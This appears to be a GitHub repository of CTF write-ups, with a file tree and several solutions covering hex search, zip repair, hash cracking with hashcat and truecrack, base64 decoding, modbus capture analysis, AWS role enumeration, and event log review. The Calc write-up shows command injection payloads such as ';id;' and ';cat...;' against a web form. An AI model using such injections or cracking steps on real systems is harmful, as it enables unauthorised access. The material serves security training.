├── GuidePoint Security October 2021 ├── Calc │ └── Writeup.md ├── GoFaster │ ├── GOFASTER.txt │ └── Writeup.md ├── Hackback │ └── Writeup.md ├── Hexy │ ├── Writeup.md │ └── hexy.zip ├── Julius │ └── Writeup.md ├── Netcatter │ ├── Writeup.md │ └── netcatter ├── README.md ├── SHA512 │ ├── Writeup.md │ └── secret.tc ├── Sub │ ├── Writeup.md │ └── sub.py └── Walk It Out │ ├── Walk_it_out.7z │ └── Writeup.md ├── HTB - Business CTF 2022 ├── Forensics │ ├── Lina's Invitation.md │ ├── MBCoin.md │ └── Perseverance.md ├── FullPwn │ └── Certification.md ├── README.md └── Reversing │ ├── Breakout.md │ └── Chromeminer.md ├── HTB - Business CTF 2023 ├── Blockchain │ └── Paid_Contr-actor.md ├── Cloud │ └── Unveiled.md ├── Forensics │ ├── Hypercraft.md │ ├── Red_Miners.md │ └── Scripts_and_Formulas.md ├── FullPwn │ ├── Contempt - Revenge.md │ ├── Contempt.md │ └── Langmon.md ├── README.md ├── Scada │ ├── Intrusion.md │ └── Watch_Tower.md └── Web │ ├── Lazy_Ballot.md │ └── Watersnake.md ├── HTB - Business CTF 2024 ├── Cloud │ └── Scurried.md ├── Forensics │ ├── Caving.md │ ├── Silicon_Data_Sleuthing.md │ └── Tangled_Heist.md ├── FullPwn │ ├── Submerged.md │ └── Survivor.md ├── Hardware │ └── Say_Cheese.md ├── Misc │ ├── Aptitude_Test.md │ ├── Chrono_Mind.md │ ├── Locked_Away.md │ └── Zephyr.md ├── README.md └── Web │ ├── Blueprint_Heist.md │ └── Jailbreak.md ├── HTB - Cyber Santa is Coming to Town 2021 ├── Crypto │ ├── Common Mistake.md │ └── Missing Reindeer.md ├── Forensics │ ├── BabyAPT.md │ ├── Giveaway.md │ ├── Honeypot.md │ └── Persist.md ├── Pwn │ └── Mr. Snowy.md ├── README.md ├── Reversing │ └── Infiltration.md └── Web │ ├── Elf Directory.md │ ├── Gadget Santa.md │ ├── Naughty or Nice.md │ ├── Toy Management.md │ └── Toy Workshop.md ├── HTB - CyberApocalypse_2022 ├── Forensics │ ├── Golden_Persistence.md │ └── Puppeter.md ├── Misc │ └── Compressor.md ├── Pwn │ └── Space-Pirate-Entrypoint.md ├── Readme.md ├── Reversing │ ├── Omega_One.md │ ├── Snakecode.md │ ├── Teleport.md │ └── Wide.md └── Web │ ├── Amidst_Us.md │ ├── BlinkerFluids.md │ ├── Kryptos_Support.md │ └── Mutation_Lab.md ├── HTB - CyberApocalypse_2023 ├── Blockchain │ ├── Navigating_the_Unknown.md │ └── Shooting101.md ├── Crypto │ ├── Ancient_Encodings.md │ └── Small_Steps.md ├── Forensics │ ├── Alien_Cradle.md │ ├── Bashic_Ransomware.md │ ├── Extraterrestrial_Persistence.md │ ├── Packet_Cyclone.md │ ├── Plaintext_Tleasure.md │ ├── Relic_Maps.md │ └── Roten.md ├── Hardware │ ├── Critical_Flight.md │ ├── Debug.md │ └── Timed_Transmission.md ├── ML │ ├── Last_Hope.md │ ├── Mysterious_Learnings.md │ └── Reconfiguration.md ├── Misc │ ├── Hijack.md │ ├── Persistence.md │ ├── Remote_Computation.md │ └── Restricted.md ├── Pwn │ ├── Getting_Started.md │ ├── Initialise_Connection.md │ ├── Labyrinth.md │ └── Questionnaire.md ├── README.md ├── Reversing │ ├── Needle_in_a_haystack.md │ └── Shattered_Tablet.md └── Web │ ├── Didactic_Octo_Paddles.md │ ├── Drobots.md │ ├── Gunhead.md │ ├── Orbital.md │ ├── Passman.md │ ├── Spybug.md │ ├── TrapTrack.md │ └── Trapped_Source.md ├── HTB - CyberApocalypse_2024 ├── Blockchain │ └── Russian_Roulette.md ├── Crypto │ ├── Dynastic.md │ ├── Iced_TEA.md │ ├── Makeshift.md │ └── Primary_Knowledge.md ├── Forensics │ ├── An_unusual_Sighting.md │ ├── Confinement.md │ ├── Data_Siege.md │ ├── Fake_Boost.md │ ├── Game_Invitation.md │ ├── It_Has_Begun.md │ ├── Phreaky.md │ ├── Pursue_the_Tracks.md │ └── Urgent.md ├── Hardware │ ├── BunnyPass.md │ └── Rids.md ├── Misc │ ├── Character.md │ ├── MultiDigilingual.md │ ├── Stop_Drop_and_Roll.md │ └── Unbreakable.md ├── Pwn │ ├── Delulu.md │ └── Writing_on_the_Wall.md ├── README.md ├── Rev │ ├── BoxCutter.md │ ├── Lootstash.md │ └── PackedAway.md └── Web │ ├── Flag_Command.md │ ├── KORP_Terminal.md │ ├── Labyrinth_Linguist.md │ ├── LockTalk.md │ ├── SerialFlow.md │ ├── Testimonial.md │ └── TimeKORP.md ├── HTB - HackTheBoo_2022 ├── Forensics │ ├── Downgrade.md │ ├── Halloween_Invitation.md │ ├── POOF.md │ ├── Trick_or_Breach.md │ └── Wrong_Spooky_Season.md ├── Pwn │ ├── Entity.md │ ├── Pumpkin_Stand.md │ └── Pumpking.md ├── README.md ├── Rev │ ├── Cult_Meeting.md │ ├── EncodedPayload.md │ ├── Ghost_Wrangler.md │ ├── Ouija.md │ └── Secure_Transfer.md └── Web │ ├── Cursed_Secret_Party.md │ ├── Evaluation_Deck.md │ ├── Horror_Feeds.md │ ├── Juggling_Facts.md │ └── Spookifier.md ├── HTB - Machines ├── SolarLab.md ├── Yummy.md └── iClean.md ├── Huntress-CTF-2023 ├── Forensics │ ├── Backdoored_Splunk.md │ ├── Bad_Memory.md │ ├── Dumpster_Fire.md │ ├── Opposable_Thumbs.md │ ├── Rogue_Inbox.md │ ├── Texas_Chainsaw_Massacre:_Tokyo_Drift.md │ ├── Traffic.md │ ├── Tragedy.md │ ├── Tragedy_Redux.md │ └── Wimble.md ├── Malware │ ├── Batchfuscation.md │ ├── Blackcat.md │ ├── Hot_Off_The_Press.md │ ├── HumanTwo.md │ ├── Opendir.md │ ├── PHP_Stager.md │ ├── Rat.md │ ├── Snake_Eater.md │ ├── Snake_Eater_II.md │ ├── Snake_Oil.md │ ├── Speakfriend.md │ ├── Thumb_Drive.md │ ├── VeeBeeEee.md │ └── Zerion.md ├── Misc │ ├── Babel.md │ ├── Discord_Snowflake_Scramble.md │ ├── I_Wont_Let_You_Down.md │ ├── Indirect_Payload.md │ ├── MFAtigue.md │ ├── M_Three_Sixty_Five.md │ ├── Operation_Eradication.md │ ├── Press_Play_on_Tape.md │ ├── Rock_Paper_Psychic.md │ ├── Welcome_to_the_Park.md │ └── Who_is_Real?.md ├── OSINT │ ├── Operation_Not_Found.md │ ├── Under_The_Bridge.md │ └── Where_am_I?.md ├── README.md ├── Stego │ └── Land_Before_Time.md └── Warmups │ ├── Baking.md │ ├── BaseFFFF+1.md │ ├── Book_By_Its_Cover.md │ ├── CaesarMirror.md │ ├── Chicken_Wings.md │ ├── Comprezz.md │ ├── Dialtone.md │ ├── F12.md │ ├── Layered_Security.md │ ├── Notepad.md │ ├── Query_Code.md │ ├── Read_The_Rules.md │ ├── String_Cheese.md │ └── Technical_Support.md ├── Huntress-CTF-2024 ├── Crypto │ ├── No_need_for_Brutus.md │ └── Strive_Marish_Leadman_TypeCDR.md ├── Forensics │ ├── Ancient_Fossil.md │ ├── Backdoored_Splunk_II.md │ ├── Hidden_Streams.md │ ├── Keyboard_Junkie.md │ └── Zimmer_down.md ├── Groups │ ├── Little_Shop_of_Hashes.md │ └── Nightmare_on_Hunt_Street.md ├── Malware │ ├── Discount_Programming_Devices.md │ ├── Eco-Friendly.md │ ├── Obfuscation_Station.md │ ├── Palimpsest.md │ ├── Ping_Me.md │ ├── Revenge_of_Discount_Programming_Devices.md │ ├── Russian_Roulette.md │ ├── Rustline.md │ ├── Strange_Calc.md │ ├── X-Ray.md │ └── eepy.md ├── Misc │ ├── 1200_Transmissions.md │ ├── Base-p-.md │ ├── Malibu.md │ ├── Red_Phish_Blue_Phish.md │ ├── Sekiro.md │ └── Time_will_tell.md ├── OSINT │ └── Ran_somewhere.md ├── Others │ ├── Baby_Overflow.md │ └── Echo_Chamber.md ├── RE │ ├── Knight's_Quest.md │ └── Stack_It.md ├── README.md ├── Warmups │ ├── Cattle.md │ ├── Finders_Fee.md │ ├── MatryoshkaQR.md │ ├── Mystery.md │ ├── TXT_Message.md │ ├── The_Void.md │ └── Zulu.md ├── Web │ ├── HelpfulDesk.md │ ├── MOVEable.md │ ├── Permission_to_Proxy.md │ ├── PillowFight.md │ ├── Plantopia.md │ ├── Y2J.md │ └── Zippy.md └── challenge-files │ ├── Challenge.zip │ ├── NTUSER.DAT │ ├── Splunk_TA_windows.zip │ ├── ancient.fossil │ ├── app.py │ ├── app.zip │ ├── babybufov │ ├── babybufov.c │ ├── based.txt │ ├── calc.zip │ ├── challenge │ ├── challenge-hidden-streams.zip │ ├── challenge-palimpsest.zip │ ├── challenge-rustline.zip │ ├── echo_chamber.pcap │ ├── eco_friendly │ ├── eepy.zip │ ├── keyboard_junkie │ ├── little_shop_of_hashes_logs.zip │ ├── logs-parts1-5.zip │ ├── oops.py │ ├── ping_me.vbs │ ├── qrcode.png │ ├── ran_somewhere.eml │ ├── russian_roulette.zip │ ├── stack_it.bin │ ├── transmissions.wav │ ├── x-ray.7z │ └── zulu ├── Nahamcon-2022 ├── A Wild Ride.md ├── Babiersteps.md ├── Baby RSA Quiz.md ├── Cereal.md ├── Crash Override.md ├── EXtravagant.md ├── Gossip.md ├── Jurassic Park.md ├── Keeber - INCOMPLETE.md ├── Mobilize.md ├── Quirky.md ├── Steamy Locomotive.md ├── The Balloon.md └── Wizard.md ├── Nahamcon-2023 ├── Forensics │ ├── Fetch.md │ ├── Perfectly_Disinfected.md │ └── Raided.md ├── Geosint.md ├── IR.md ├── Misc │ ├── Where's_my_Water.md │ ├── Wordle_Bash.md │ └── Zombie.md ├── README.md ├── Warmups │ ├── Blobber.md │ ├── Glasses.md │ ├── Online_Chatroom.md │ └── Regina.md └── Web │ ├── Marmalade_5.md │ ├── Museum.md │ ├── Star_Wars.md │ └── Stickers.md ├── Nahamcon-2024 ├── Forensics │ ├── LogJam.md │ └── Taking_Up_Residence.md ├── Malware │ ├── Brain_Melt_2.md │ └── Perfectly_Legit_Crypto_Casino.md ├── Misc │ ├── Curly_Fries.md │ ├── Not_Quite_The_Same.md │ └── Seventy_Eight.md ├── Mobile │ ├── Buggy_Jumper_1.md │ ├── Buggy_Jumper_2.md │ ├── Fly_Away_1.md │ └── Kitty_Kitty_Bang_Bang.md ├── Others │ ├── Basics.md │ ├── Indicium.md │ └── Secret_Info.md ├── README.md ├── Rev │ ├── Locked_Box.md │ ├── Taylors_First_Swift.md │ └── Whats_In_The_Box.md └── Web │ ├── Hacker_Web_Store.md │ ├── The_Davinci_Code.md │ └── Thomas_DEVerson.md ├── SnykCon2021 ├── All your flags are belong to root │ └── Writeup.md ├── Browser Preview │ └── Writeup.md ├── ElectronBuzz │ └── Writeup.md ├── Invisible Ink │ └── Writeup.md ├── Magician │ └── Writeup.md ├── Not-hot-dog │ └── Writeup.md ├── README.md ├── Robert Louis Stevenson │ └── Writeup.md ├── Sauerkraut │ └── Writeup.md ├── Zip Viewer │ └── Writeup.md └── qrrr │ └── Writeup.md ├── SnykCon2025 ├── Binary_Exploitation │ ├── Additional_Information_Needed.md │ ├── Calculator.md │ └── Echo.md ├── Crypto │ └── Padding_Gambit.md ├── Forensics │ ├── ClickityClack.md │ └── Free_Range_Packets.md ├── README.md ├── Rev │ ├── An_Offset_Among_Friends.md │ ├── Crabshell.md │ ├── Either-Or.md │ ├── Its_go_time.md │ ├── Math_for_Me.md │ └── letters2nums.md ├── Scripting │ └── Coding_Mountains.md ├── Warmups │ ├── Screaming_Crying_Throwing_up.md │ └── Zero_Ex_Six_One.md ├── Web │ ├── D0nutShop.md │ ├── Plantly.md │ ├── TimeOff.md │ ├── Unfurl.md │ ├── VulnScanner.md │ ├── Weblog.md │ ├── Who_is_JH.md │ └── idi0Tic.md └── attachments │ ├── Padding_Gambit.7z │ ├── an-offset │ ├── calculator.py │ ├── challenge.elf │ ├── click.pcapng │ ├── crabshell │ ├── donutshop.zip │ ├── echo │ ├── either-or │ ├── encflag.txt │ ├── flag.txt.encry │ ├── freeRangePackets.pcapng │ ├── idiotic.zip │ ├── its-go-time │ ├── letters2nums.elf │ ├── math4me │ ├── mountains.json │ ├── plantly.zip │ ├── screaming.bin │ ├── timeoff.zip │ ├── unfurl.zip │ ├── vulnscanner.zip │ ├── weblog.zip │ └── who-is-jh.zip ├── THM - AdventofCyber_2023: SideQuests ├── SideQuest1.md ├── SideQuest2.md ├── SideQuest3-Unintended.md └── SideQuest4.md └── Unbreakable-Individual-2024 ├── easy-hide.md ├── fake-add.md ├── flagen.md ├── improper-configuration.md ├── intro-to-assembly.md ├── password-manager-is-a-must.md ├── persisten-reccon.md ├── privilege-not-included.md ├── pygment.md ├── rfc-meta.md ├── safe-password.md ├── secrets-of-winter.md ├── sided-curl.md ├── something-happened.md ├── start-enc.md ├── traffic-e.md ├── wifibasic.md ├── wifiland.md └── you-can-trust-me.md /GuidePoint Security October 2021/Calc/Writeup.md: -------------------------------------------------------------------------------- 1 | This one took me longer than I care to admit. I kept overthinking and overcomplicating things. 2 | 3 | We just get a page to visit: 4 | 5 | ![image](https://user-images.githubusercontent.com/80063008/137874431-bf115ab7-b688-4266-bc7a-58fcf2eb8d2a.png) 6 | 7 | We can see it is allowing us to enter letters and numbers and it is doing some math. 8 | 9 | ![image](https://user-images.githubusercontent.com/80063008/137874512-ba7f4715-4169-4e2c-834c-17d72b8f0244.png) 10 | ![image](https://user-images.githubusercontent.com/80063008/137874533-d5f93df7-781d-4883-8827-e098cc309d3a.png) 11 | 12 | Checking with various symbols in the values to try and break the syntax, we see that inserting a `;` breaks the syntax. So if we break the syntax, put in our command, then put the `;` back to repair the syntax, we get command injection. 13 | 14 | `;id;` 15 | 16 | ![image](https://user-images.githubusercontent.com/80063008/137874578-5ba4f228-19ca-4c48-8fb9-312e2d08a49d.png) 17 | 18 | `;ls;` 19 | 20 | ![image](https://user-images.githubusercontent.com/80063008/137874598-0ea22606-1ba5-4f5e-a374-452678a540ba.png) 21 | 22 | `;cat+calchdeyenbdw7wjh281y1hd771ujs718hq.txt;` 23 | 24 | Or just because it's in the root folder of the web application, just go directly on the page 25 | 26 | ![image](https://user-images.githubusercontent.com/80063008/137874633-eb421f91-1f21-4f9e-8373-addd67de82f7.png) 27 | 28 | GPSCTF{89dcce9621fb7181cab196b592116c1a} 29 | -------------------------------------------------------------------------------- /GuidePoint Security October 2021/GoFaster/Writeup.md: -------------------------------------------------------------------------------- 1 | We are given a text file: 2 | 3 | ![image](https://user-images.githubusercontent.com/80063008/137870318-48f400e1-fe49-4057-b537-88048f1811a7.png) 4 | 5 | 6 | With 19999 lines of hex codes: 7 | 8 | ![image](https://user-images.githubusercontent.com/80063008/137870332-a967a39c-6fde-4256-ae35-e4d51936f863.png) 9 | 10 | 11 | Converted what I expected to see in a flag (CTF) to hex: 12 | 13 | ![image](https://user-images.githubusercontent.com/80063008/137870346-87fbeae3-65ff-462c-b7d1-e08b11e44a00.png) 14 | 15 | 16 | Then grepped for that string in the entire file: 17 | 18 | ```bash 19 | grep "435446" GOFASTER.txt 20 | ``` 21 | 22 | ![image](https://user-images.githubusercontent.com/80063008/137870366-c3e81067-5520-48f1-8fd0-af4adf85eef2.png) 23 | 24 | 25 | Based on the positioning of the string in the hex, I figured the second one should be the flag. 26 | 27 | ![image](https://user-images.githubusercontent.com/80063008/137870376-b9cdd507-8790-4ce9-a250-fbc683963e98.png) 28 | 29 | 30 | StormCTF{Learners:Encoding4:56fe2c8aB2A2cA0EedaA54f499fcfd1a} 31 | -------------------------------------------------------------------------------- /GuidePoint Security October 2021/Hexy/Writeup.md: -------------------------------------------------------------------------------- 1 | We are given just a single zip file. 2 | 3 | ![image](https://user-images.githubusercontent.com/80063008/137869702-cc3ac824-9533-4f14-ae0d-70a3fc5ccb8c.png) 4 | 5 | 6 | It seems to be corrupted. 7 | 8 | ![image](https://user-images.githubusercontent.com/80063008/137869728-e9874955-607d-46a8-a38f-0dcfcb8df436.png) 9 | 10 | But if we open it in hexeditor, we can see a wrong header so we can fix that. Replace the 7 with a 5 since the correct header for a zip file is 11 | `70480304`. 12 | 13 | ![image](https://user-images.githubusercontent.com/80063008/137869748-747fd4c9-b310-47d0-ad1b-127425d93a41.png) 14 | 15 | We can then try to unzip it but is password protected. So we can use zip2john to get the hash. 16 | 17 | ```bash 18 | zip2john hexy.zip > hash.txt 19 | ``` 20 | 21 | I first passed it to hashcat to crack in my Windows machine to use the GPU as it's way faster: 22 | 23 | ```cmd 24 | hashcat.exe -m 17210 hash.txt rockyou.txt --username 25 | ``` 26 | 27 | It failed to crack it. So I added the best64 rule and that helped crack the password: forgetfulness 28 | 29 | ```cmd 30 | hashcat.exe -m 17210 hash.txt rockyou.txt --username -r rules\best64.rule 31 | ``` 32 | 33 | Unzipped the file and got the flag: 34 | 35 | GPSCTF{871daf25893451d1ea8ba3b6736cce52} 36 | -------------------------------------------------------------------------------- /GuidePoint Security October 2021/Hexy/hexy.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/GuidePoint Security October 2021/Hexy/hexy.zip -------------------------------------------------------------------------------- /GuidePoint Security October 2021/Julius/Writeup.md: -------------------------------------------------------------------------------- 1 | We are given a cipher. 2 | 3 | ![image](https://user-images.githubusercontent.com/80063008/137869533-55a72cbd-eca4-499e-9c21-fb410bcd06e3.png) 4 | 5 | 6 | If we put it in cyberchef we can see it's just hex which deciphers to something that looks like ROT13. 7 | 8 | ![image](https://user-images.githubusercontent.com/80063008/137869568-19234209-6a46-498f-ba59-cdca1e66a16a.png) 9 | 10 | 11 | If we add ROT13 in Cyberchef, we get the flag: 12 | 13 | ![image](https://user-images.githubusercontent.com/80063008/137869578-3f65957e-d95a-493e-b6ca-9f6dca9715d6.png) 14 | 15 | 16 | GPSCTF{11fdd9e891aae2f0c0bce02cd2aaa7f2} 17 | -------------------------------------------------------------------------------- /GuidePoint Security October 2021/Netcatter/netcatter: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/GuidePoint Security October 2021/Netcatter/netcatter -------------------------------------------------------------------------------- /GuidePoint Security October 2021/README.md: -------------------------------------------------------------------------------- 1 | Scored 5th/258 in GuidePoint Security October's CTF. It was loads of fun, I really hope to see some writeups of the challenges I haven't solved. If anyone has done `Best Foot Forward`, `Corona` or `ZipRecon`, please show me some writeup or tell me what the deal was with those. I got some parts of them, but didn't get to the finish line. 2 | 3 | Here are my writeups for the challenges I solved. 4 | 5 | ![image](https://user-images.githubusercontent.com/80063008/137867433-11fb15c8-605b-4eeb-bcb7-136b4921793e.png) 6 | ![image](https://user-images.githubusercontent.com/80063008/137867467-aa07f054-5c3e-4ac9-879e-0e5dc338b900.png) 7 | ![image](https://user-images.githubusercontent.com/80063008/137867476-f825c8bf-8cfc-40ac-af44-b381bdaf70f7.png) 8 | -------------------------------------------------------------------------------- /GuidePoint Security October 2021/SHA512/Writeup.md: -------------------------------------------------------------------------------- 1 | 2 | We are given a flag called secret.tc 3 | 4 | 5 | ![image](https://user-images.githubusercontent.com/80063008/137866702-c422ec5d-cb2c-4802-a562-6917e2f01559.png) 6 | 7 | 8 | Some Google-fu research shows that it is a TrueCrypt file. I installed TrueCrypt and it required a password to mount the file as a volume. 9 | 10 | ![image](https://user-images.githubusercontent.com/80063008/137867198-43aaa0e5-36ee-44d7-8bb1-98bddb14bdc1.png) 11 | 12 | Did some more Google-fu and found there's a linux tool called TrueCrack which can crack the password for such files. 13 | 14 | The help section of the tool mentioned a key type as an option and Sha512 was one of the options. Which rings back to the title of the challenge. 15 | 16 | ![image](https://user-images.githubusercontent.com/80063008/137866772-59ea0389-57ae-4450-a917-924c0f3c892d.png) 17 | 18 | Ran the syntax below to crack the password: 19 | 20 | ```bash 21 | truecrack -t secret.tc -w /usr/share/wordlists/rockyou.txt -k 512 22 | ``` 23 | 24 | ![image](https://user-images.githubusercontent.com/80063008/137866792-bc5c14cd-90ec-43a6-856b-051ddc92f36a.png) 25 | 26 | Got the password, and used it to mount the file. Then opened it in Notepad++. 27 | 28 | ![image](https://user-images.githubusercontent.com/80063008/137866842-b93c2426-8a11-486e-8be9-ef5d4fda9ffb.png) 29 | 30 | StormCTF{Misc4:c7B645DDa98414f7a7D0a23EeA36eFa1} 31 | -------------------------------------------------------------------------------- /GuidePoint Security October 2021/SHA512/secret.tc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/GuidePoint Security October 2021/SHA512/secret.tc -------------------------------------------------------------------------------- /GuidePoint Security October 2021/Sub/sub.py: -------------------------------------------------------------------------------- 1 | key = {'1': 'j', '0': 'X', '3': 'F', '2': 'o', '5': 'T', '4': 'x', '7': '0', '6': 'P', '9': '}', '8': 'J', ':': 'b', 'A': 'c', 'C': 'p', 'B': 'q', 'E': '7', 'D': 'a', 'G': 'v', 'F': '3', 'I': '5', 'H': '1', 'K': 'O', 'J': 'K', 'M': 'g', 'L': '2', 'O': 'n', 'N': '8', 'Q': 'y', 'P': 'E', 'S': 'e', 'R': 'R', 'U': 'h', 'T': 'W', 'W': 'N', 'V': 'm', 'Y': '9', 'X': 'G', 'Z': 'S', 'a': 'k', 'c': 't', 'b': 'd', 'e': '{', 'd': '4', 'g': 'C', 'f': 'L', 'i': '6', 'h': 'l', 'k': 'Z', 'j': 'z', 'm': 'U', 'l': 's', 'o': 'B', 'n': 'M', 'q': 'I', 'p': 'i', 's': ':', 'r': 'Q', 'u': 'Y', 't': 'r', 'w': 'V', 'v': 'H', 'y': 'D', 'x': 'A', '{': 'f', 'z': 'w', '}': 'u'} 2 | encrypted = 'erBQUpW3fpQDirBFb7c}}FdPT0}x0jdLcokk}xq7jaT3Lpqkju' 3 | 4 | while True: 5 | encrypted = encrypted.translate(str.maketrans(key)) 6 | if 'StormCTF' in encrypted and encrypted[-1] == "}": 7 | print(encrypted) 8 | break 9 | -------------------------------------------------------------------------------- /GuidePoint Security October 2021/Walk It Out/Walk_it_out.7z: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/GuidePoint Security October 2021/Walk It Out/Walk_it_out.7z -------------------------------------------------------------------------------- /HTB - Business CTF 2022/README.md: -------------------------------------------------------------------------------- 1 | We were able to place 67th out of 2979 teams, 9/33 solves... that's top 2.2%. 2 | 3 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/028efa74-fcae-45b0-a695-0bd6bf145a2d) 4 | -------------------------------------------------------------------------------- /HTB - Business CTF 2023/Forensics/Red_Miners.md: -------------------------------------------------------------------------------- 1 | ### Challenge description 2 | 3 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/5f25ec84-fc05-4775-a96e-29f27f1d586f) 4 | 5 | We get bash script from this challenge: 6 | 7 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/773aebe1-07c1-40fb-8616-2d394803a191) 8 | 9 | I didn't look to deep into it, so I don't know what it actually does. My eyes fell directly and some base64 strings in several different parts of the code. 10 | 11 | Part 1 on line 761: 12 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/f8f56c8a-8189-4fe8-97f0-a50aecda4557) 13 | 14 | ```bash 15 | echo cGFydDE9IkhUQnttMW4xbmciCg==|base64 -d 16 | ``` 17 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/c7e40797-6e4d-45b4-b65e-197ede85fa78) 18 | 19 | Part 2 on line 636: 20 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/89cb1857-b054-4e7f-8037-e1f01bd97c1a) 21 | 22 | ```bash 23 | echo cGFydDI9Il90aDMxcl93NHkiCg==|base64 -d 24 | ``` 25 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/5a674d08-75c2-43f3-8f4b-644e4873c0e7) 26 | 27 | Part 3 on line 701: 28 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/31449608-b23d-4a24-b52f-2cd9eab44864) 29 | 30 | ```bash 31 | echo X3QwX200cnN9Cg==|base64 -d 32 | ``` 33 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/49cb28c5-b839-45d8-8302-baf814cc55bf) 34 | 35 | HTB{m1n1ng_th31r_w4y_t0_m4rs} 36 | -------------------------------------------------------------------------------- /HTB - Business CTF 2023/README.md: -------------------------------------------------------------------------------- 1 | We were able to place 44th out of 982 teams, 19/46 solves... that's top 4.4%. 2 | 3 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/5ec45c01-844c-4921-b690-533ff01b86f0) 4 | -------------------------------------------------------------------------------- /HTB - Business CTF 2023/Scada/Watch_Tower.md: -------------------------------------------------------------------------------- 1 | ### Challenge Description 2 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/c1efa2f9-6af9-4501-9f2a-42d0c9420c5c) 3 | 4 | We get a wireshark capture for this challenge. The capture contains modbus traffic with multiple `Write Multiple Registers` functions. The `Reference Numbers` look to be decimals: 5 | 6 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/50436850-ecd5-4d7a-8235-4a4a5ab29eea) 7 | 8 | We can use the syntax below with tshark to carve all of them out: 9 | 10 | ```bash 11 | tshark -r tower_logs.pcapng -Y "modbus" -T fields -e modbus.reference_num|grep .|awk '{print $1}' ORS=' ' 12 | ``` 13 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/5287e38b-1867-4bdf-b255-197ce6c38159) 14 | 15 | After converting from Decimal using Cyberchef, we get the flag: 16 | 17 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/92d9c1e2-9b1f-4662-94c4-c552e67b9b89) 18 | 19 | HTB{m0d8u5_724ff1c_15_un3nc2yp73d!@^} 20 | -------------------------------------------------------------------------------- /HTB - Business CTF 2024/Cloud/Scurried.md: -------------------------------------------------------------------------------- 1 | ### Challenge Description 2 | 3 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/cabf4dcd-cb39-4b2c-8226-097dfb4ac48c) 4 | 5 | ## Solution 6 | 7 | The challenge provides a simple text file with what looks to be an AWS IAM role id: `AROAXYAFLIG2BLQFIIP34`. A bit of research led us to [this](https://hackingthe.cloud/aws/enumeration/enumerate_principal_arn_from_unique_id/) helpful article. 8 | 9 | From our own AWS portal, we go to IAM role and create a custom trust policy in which we set the principal AWS to the provided role id. 10 | 11 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/8797cd35-86de-4bed-924f-b7273341d9bd) 12 | 13 | We can save this with whatever name we want. Then we access the role and look at the Trust Relationships. We will see that the `arn` we need was populated: 14 | 15 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/defeb2e7-c1d1-4c45-a046-436a9a7e0362) 16 | 17 | `HTB{arn:aws:iam::532587168180:role/vault101}` 18 | -------------------------------------------------------------------------------- /HTB - Business CTF 2024/Forensics/Caving.md: -------------------------------------------------------------------------------- 1 | ### Challenge Description 2 | 3 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/2f8cb80a-a44a-4979-bd76-fcaf342a008a) 4 | 5 | ## Enumeration 6 | 7 | For this challenge, we get a bunch of Windows EventViewer logs in their standard form of `evtx` files. 8 | 9 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/18588261-df28-48e2-82ce-4ca6576f4c14) 10 | 11 | I like converting them to a human readable format as they are easier to strings and grep through. 12 | 13 | ```bash 14 | sudo apt install python3-evtx 15 | mkdir converted 16 | for file in ./*.evtx;do evtx_dump.py "$file" > converted/"${file%.evtx}.xml";done 17 | ``` 18 | I started by looking for powershell scripts being run: 19 | 20 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/e97df80c-6021-41a6-8b20-5386159130fe) 21 | 22 | ## Solution 23 | 24 | I opened the Windows Powershell Operational file and looked at the content of the `h.ps1` file and my eyes landed on the `SFRC` which is the Base64 encoded HTB string. I've done a lot of challenges on HTB so I recognize it immediately: 25 | 26 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/4dcefb42-0d23-4809-b94c-faf248732e69) 27 | 28 | We decode it and get the flag: 29 | 30 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/df155627-68a7-4617-8700-6d8598f93e4c) 31 | 32 | `HTB{1ntruS10n_d3t3ct3d_!!!}` 33 | 34 | -------------------------------------------------------------------------------- /HTB - Business CTF 2024/Misc/Aptitude_Test.md: -------------------------------------------------------------------------------- 1 | ### Challenge Description 2 | 3 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/7b61cb64-b4cc-4312-8885-7b6ffb13d114) 4 | 5 | ## Solution 6 | 7 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/4b78c478-9497-4322-8b39-d79133052a61) 8 | 9 | I'm not sure what was up with this challenge, but as you can see from the screenshot above, I just repeatedly answered D and it spit out the flag. Got lucky I guess but it's a very easy challenge and we have a lot more to go through so we just move along. 10 | 11 | `HTB{c0nNeCt3d_t0_mY_rOl3!_c90d1982b1e1dfe3a2498b0ad6eba90e}` 12 | -------------------------------------------------------------------------------- /HTB - Business CTF 2024/README.md: -------------------------------------------------------------------------------- 1 | We were able to place 131st out of 943 teams, 25/63 solves... that's top 13.8%. 2 | 3 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/1b53d10f-b01b-40fb-bb1f-919529662517) 4 | 